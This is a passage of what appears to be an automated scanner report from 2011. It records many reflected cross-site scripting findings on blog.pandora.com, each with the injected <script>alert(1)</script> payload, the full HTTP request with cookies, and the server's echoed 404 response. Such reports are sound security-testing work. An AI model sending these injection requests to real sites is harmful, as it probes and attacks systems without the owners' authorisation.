Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:01 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/200718bad<script>alert(1)</script>8f17e8b3118/10/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload d51e2<script>alert(1)</script>da535d0049d was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2007/10d51e2<script>alert(1)</script>da535d0049d/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:03 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2007/10d51e2<script>alert(1)</script>da535d0049d/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 17f6e<script>alert(1)</script>7ad2feaf14c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora17f6e<script>alert(1)</script>7ad2feaf14c/archives/2007/11/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:54 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora17f6e<script>alert(1)</script>7ad2feaf14c/archives/2007/11/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload a9e9a<script>alert(1)</script>743af107344 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archivesa9e9a<script>alert(1)</script>743af107344/2007/11/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:56 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Content-Length: 349
Connection: close
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archivesa9e9a<script>alert(1)</script>743af107344/2007/11/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 76aa1<script>alert(1)</script>70d85d884f6 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/200776aa1<script>alert(1)</script>70d85d884f6/11/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:58 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/200776aa1<script>alert(1)</script>70d85d884f6/11/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload be509<script>alert(1)</script>31065c5cb7d was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2007/11be509<script>alert(1)</script>31065c5cb7d/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:02 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2007/11be509<script>alert(1)</script>31065c5cb7d/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 22432<script>alert(1)</script>251e4966396 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora22432<script>alert(1)</script>251e4966396/archives/2007/12/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:49 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora22432<script>alert(1)</script>251e4966396/archives/2007/12/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 6520c<script>alert(1)</script>295fc6b8631 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives6520c<script>alert(1)</script>295fc6b8631/2007/12/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:52 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives6520c<script>alert(1)</script>295fc6b8631/2007/12/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload a6d8f<script>alert(1)</script>3888aff47e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2007a6d8f<script>alert(1)</script>3888aff47e/12/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:54 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 348

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2007a6d8f<script>alert(1)</script>3888aff47e/12/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 3bf47<script>alert(1)</script>c247d05fe1f was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2007/123bf47<script>alert(1)</script>c247d05fe1f/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:57 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2007/123bf47<script>alert(1)</script>c247d05fe1f/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 9839c<script>alert(1)</script>cc1f4677e63 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora9839c<script>alert(1)</script>cc1f4677e63/archives/2008/01/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:50 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora9839c<script>alert(1)</script>cc1f4677e63/archives/2008/01/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload c4d9b<script>alert(1)</script>1d7f2c0691b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archivesc4d9b<script>alert(1)</script>1d7f2c0691b/2008/01/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:52 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archivesc4d9b<script>alert(1)</script>1d7f2c0691b/2008/01/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 59e99<script>alert(1)</script>825e8cfc0de was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/200859e99<script>alert(1)</script>825e8cfc0de/01/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:54 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/200859e99<script>alert(1)</script>825e8cfc0de/01/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload fe2be<script>alert(1)</script>1f3f48cf5b1 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2008/01fe2be<script>alert(1)</script>1f3f48cf5b1/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:57 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2008/01fe2be<script>alert(1)</script>1f3f48cf5b1/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 2ac1f<script>alert(1)</script>ef5a796adc4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora2ac1f<script>alert(1)</script>ef5a796adc4/archives/2008/02/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:48 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora2ac1f<script>alert(1)</script>ef5a796adc4/archives/2008/02/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 34032<script>alert(1)</script>06892156e4e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives34032<script>alert(1)</script>06892156e4e/2008/02/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:51 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives34032<script>alert(1)</script>06892156e4e/2008/02/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 6411d<script>alert(1)</script>c8b26e3f983 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/20086411d<script>alert(1)</script>c8b26e3f983/02/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:53 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/20086411d<script>alert(1)</script>c8b26e3f983/02/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload e1573<script>alert(1)</script>3b6a99d2827 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2008/02e1573<script>alert(1)</script>3b6a99d2827/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:56 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2008/02e1573<script>alert(1)</script>3b6a99d2827/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 172d5<script>alert(1)</script>d6b14e8dbb2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora172d5<script>alert(1)</script>d6b14e8dbb2/archives/2008/03/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:47 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora172d5<script>alert(1)</script>d6b14e8dbb2/archives/2008/03/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 5ee2e<script>alert(1)</script>224981c07fd was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives5ee2e<script>alert(1)</script>224981c07fd/2008/03/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:49 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
